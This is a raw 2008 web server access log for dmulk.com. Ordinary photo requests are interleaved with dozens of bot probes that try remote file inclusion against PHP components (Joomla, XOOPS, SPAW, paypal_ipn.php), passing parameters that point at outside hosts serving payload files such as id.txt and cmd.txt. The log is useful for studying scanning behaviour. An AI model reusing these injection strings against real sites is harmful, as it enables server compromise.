61.19.158.41 - - [28/Aug/2008:10:18:55 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.251.162.130 - - [28/Aug/2008:10:18:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uba.dk/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:19:05 -0700] "GET /logs/access_080313.log/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [28/Aug/2008:10:19:18 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uba.dk/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:19:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:19:54 -0700] "GET /logs/access_080718.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:20:11 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:20:11 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:20:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0055.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:20:47 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:21:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:21:08 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:21:09 -0700] "GET /?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 85163 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:21:10 -0700] "GET /logs/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62571 "-" "libwww-perl/5.810" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:21:13 -0700] "GET /logs/access_080801.log/include/paypal_ipn.php?abs_path=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:21:14 -0700] "GET /include/paypal_ipn.php?abs_path=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:21:14 -0700] "GET /logs/include/paypal_ipn.php?abs_path=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:21:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:21:52 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0128.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:22:15 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:22:15 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:22:16 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:22:34 -0700] "GET /logs/access_080725.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.216.249.151 - - [28/Aug/2008:10:22:38 -0700] "GET /logs/access_080711.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:22:42 -0700] "GET /logs/access_080503.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:22:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:22:44 -0700] "GET /logs/access_080324.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:22:45 -0700] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:22:45 -0700] "GET /errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:22:53 -0700] "GET /logs/access_080702.log/include/paypal_ipn.php?abs_path=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:23:10 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0012.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:20 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:23:33 -0700] "GET /logs/access_080118.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:43 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:10:23:43 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:23:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:23:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0104.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:23:58 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:23:58 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:23:59 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:24:00 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:00 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:00 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:02 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:02 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:03 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:05 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:05 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:07 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:07 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:08 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:09 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:10 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:10 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:12 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:12 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:13 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:14 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:10:24:14 -0700] "GET /logs/access_080615.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:15 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:15 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:17 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:17 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:18 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:18 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
99.238.83.238 - - [28/Aug/2008:10:24:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Creative ZENcast v2.00.14)" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:10:24:20 -0700] "GET /logs/access_080710.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:24:32 -0700] "GET /logs/access_080306.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:24:39 -0700] "GET /logs/access_080809.log/errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:24:40 -0700] "GET /errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:24:40 -0700] "GET /logs/errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:24:56 -0700] "GET /logs/access_080315.log/errors.php?error=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:24:57 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:24:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:25:00 -0700] "GET /logs/access_080725.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:25:17 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:10:25:18 -0700] "GET /logs/access_080608.log/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:25:27 -0700] "GET /logs/access_080410.log/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:25:27 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:25:27 -0700] "GET /logs/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:10:25:36 -0700] "GET /logs/access_071224.log HTTP/1.0" 200 205925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:25:45 -0700] "GET /logs/access_080410.log/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:25:45 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:25:47 -0700] "GET /logs/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:26:02 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:26:11 -0700] "GET /logs/access_080805.log/?custompluginfile[]=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:26:11 -0700] "GET /logs/?custompluginfile[]=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 200 62571 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:26:12 -0700] "GET /logs/access_080719.log/?custompluginfile[]=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:26:12 -0700] "GET /?custompluginfile[]=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 200 85159 "-" "libwww-perl/5.65" "www.dmulk.com"
193.142.215.12 - - [28/Aug/2008:10:26:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.142.215.12 - - [28/Aug/2008:10:26:18 -0700] "GET /phphtml.php?htmlclass_path=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:26:23 -0700] "GET /logs/access_080214.log/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:10:26:26 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.142.215.12 - - [28/Aug/2008:10:26:29 -0700] "GET /logs/phphtml.php?htmlclass_path=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.142.215.12 - - [28/Aug/2008:10:26:29 -0700] "GET /phphtml.php?htmlclass_path=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
